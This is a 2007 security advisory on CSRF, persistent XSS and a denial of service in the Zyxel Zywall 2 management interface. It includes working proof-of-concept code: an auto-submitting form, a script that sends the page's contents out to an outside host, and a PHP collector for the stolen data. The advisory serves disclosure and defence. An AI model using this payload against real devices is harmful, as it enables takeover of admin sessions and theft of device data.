zyxel_070810.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Louhi Networks Oy  
-= Security Advisory =-  
  
  
Advisory: Zyxel Zywall 2 Multiple vulnerabilities  
Release Date: 2007-08-10  
Last Modified: 2007-08-10  
Authors: Henri Lindberg, Associate of (ISC)²  
[[email protected]]  
  
Application: ZyNOS Firmware Version: V3.62(WK.6) | 06/16/2004  
Devices: Zyxel Zywall2 (possibly all other Zyxel devices using  
the same firmware)  
Severity: Moderate  
Impact: Persistent cross site scripting, cross site request  
forgery, persistant denial of service  
Vendor Status: Vendor notified  
References: http://www.louhi.fi/advisory/zyxel_070810.txt  
  
  
Overview:  
  
During an audit of Zyxel Zywall 2 it was discovered that a cross  
site request forgery and persistent cross site scripting  
vulnerability exists in the management interface. Thus, it is  
possible for an attacker to perform any administrative actions in  
the management interface, if a logged-in/authenticated user has been  
enticed to visit a malicious web site. These actions include e.g.  
changing dns server address or other security critical configuration  
items.  
  
It was also discovered that it is possible to "brick" the device by  
submitting invalid configuration to the device, thus performing a  
persistant denial of service attack against it.  
  
Details:  
  
Embedded device management interface does not validate the origin  
of an HTTP request. If attacker is able to make an authenticated  
user visit a hostile web page, a device can be controlled by  
submitting suitable forms. It is possible to steal information from  
the device and modify the configuration. See provided  
proof-of-concept code for more information.  
  
Successful attack requires that the attacker knows the management  
interface address for the target device. As the management interface  
is most usually located at the default IP address and might even have  
default password in place, performing an successful attack is not far  
fetched.  
  
By submitting invalid configuration to the management interface it is  
possible to perform a persistant denial of service attack against the  
device. After receiving invalid configuration, the device will reboot  
and enter an infinite reboot loop. Powering off the device, or  
pressing reset button will not help. It has not been researched if  
the device can be restored from this state (it does not have any  
reset jumpers or battery powered memory). From an ordinary consumer's  
point-of-view, the device is compeletely useless. No proof-of-concept  
code will be released, but finding this vulnerability is trivial.  
  
More information:  
http://en.wikipedia.org/wiki/Cross-site_request_forgery  
  
Proof of Concept:  
  
Include a random user-specific token in forms.  
  
Example form (exploits persistent XSS):  
  
<html>  
<body onload="document.CSRF.submit()">  
<FORM name="CSRF" METHOD="POST"  
ACTION="http://192.168.1.1/Forms/General_1">  
<INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"  
<INPUT NAME="sysDomainName" VALUE="evil.com">  
<INPUT NAME="StdioTimout" VALUE="0">  
<INPUT NAME="sysSubmit" VALUE="Apply">  
</form>  
</body>  
</html>  
  
X:  
- ------  
document.write("Security Updates - <a  
href='http://www.checkpoint.com/'>http://www.zyxel.com</a>");  
  
function getPage(){  
i = 0;  
data = encodeURIComponent(document.body.innerHTML);  
  
  
while (i < data.length)  
{  
  
tmp = data.substr(i, 4096);  
(new Image()).src = "http://nx.fi/xss/getinfo.php?page=" + tmp;  
i += 4096;  
}  
  
}  
  
setTimeout("getPage()", 1000);  
- ------  
  
getinfo.php:  
- ------  
<?php  
  
$sent = isset($_REQUEST['page']);  
$data = "";  
  
if($sent)  
{  
  
$data .= "<pre>";  
foreach($_REQUEST as $tmp) {  
$data .= htmlspecialchars(urldecode($tmp));  
}  
  
$data .= "</pre>";  
  
$myfile = "log.html";  
$handle = fopen($myfile, 'a');  
fwrite($handle, $data);  
fclose($handle);  
  
}  
  
  
?>  
- ------  
  
Notice that you 'system name' variable is limited in length, so you'll  
need a relatively short URL.  
  
Workaround:  
  
Change administration password and default IP address.  
Perform administration using SSH.  
  
  
Disclosure Timeline:  
  
May 10 2007 - Contacted Zyxel by email  
May 11 2007 - Vendor responded by email  
June 7 2007 - Vendor stated that this not an urgent issue  
June 28 2007 - Provided vendor with a proof-of-concept attack  
August 10 2007 - Advisory released  
  
  
Copyright 2007 Louhi Networks Oy. All rights reserved.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.5 (MingW32)  
  
iEYEAREIAAYFAka8P3UACgkQ3TZNEGeZkm5eGACffzkmceMKroY4VTKxPX/ec5eH  
0AsAn1uIxklFttYYlviEOJ42EXP0yTH1  
=06kW  
-----END PGP SIGNATURE-----  
`